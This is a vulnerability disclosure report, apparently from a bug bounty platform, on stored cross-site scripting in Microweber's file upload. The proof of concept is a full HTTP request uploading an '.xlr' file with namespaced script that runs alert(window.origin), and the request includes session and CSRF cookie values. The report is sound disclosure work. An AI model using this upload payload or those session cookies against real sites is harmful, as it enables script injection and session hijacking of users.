Cross-site scripting - Stored via upload ".xlr" file in microweber/microweber

Valid

Reported on

Jul 2nd 2022

Description

In file upload function, the server allow upload .xlr file with contain some javascript code lead to XSS.

Proof of Concept

REQUEST

POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Ashop/action%3Aproducts%23action%3Dnew%3Aproduct; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 959
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/admin/view:shop/action:products
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="name"

xss_poc.xlr
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunk"

0
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunks"

1
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>
-----------------------------80883503232369887683205133266--

RESPONSE

HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:22:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:22:44 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 129

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss-poc.xlr","name":"xss-poc.xlr","bytes_uploaded":"959"}